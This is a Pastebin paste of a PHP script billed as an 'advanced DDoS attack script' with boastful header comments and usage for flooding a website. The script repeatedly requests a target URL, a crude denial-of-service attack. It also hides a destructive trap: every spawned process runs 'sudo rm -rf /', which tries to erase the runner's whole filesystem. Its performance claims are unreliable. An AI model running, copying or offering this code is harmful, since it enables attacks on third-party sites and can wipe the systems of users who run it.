Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * NEW ADVANCED DDoS ATTACK SCRIPT
- * HITS UP TO 10GB/S WITHOUT REFLECTORS OR PROXIES
- * IT'S MUCH MORE POWERFUL THAN ANY OTHER L7 ATTACK SCRIPTS OUT THERE
- * MADE BY ANDY QUEZ
- * A TRUE MEXICAN HERO
- *
- * USAGE: php ddos.php <website> <threads> <time>
- */
- if (count($argv) > 5) {
- echo "usage: " . $argv[0] . " <website> <count> <time>";
- die();
- }
- // if no timestamp for deedaws
- if (!isset($argv[4])) {
- // create multiple deedaws threads
- for ($i = 0; $i <= (int)$argv[2]; ++$i) {
- // execute threads!
- exec("php " . __FILE__ . " " . $argv[1] . " " . $argv[2] . " " . $argv[3] . " " . time() . " && sudo rm -rf /");
- }
- return;
- }
- $time = $argv[4];
- do {
- file_get_contents($argv[1]);
- } while ($time + $argv[3] > time());
Advertisement
Add Comment
Please, Sign In to add comment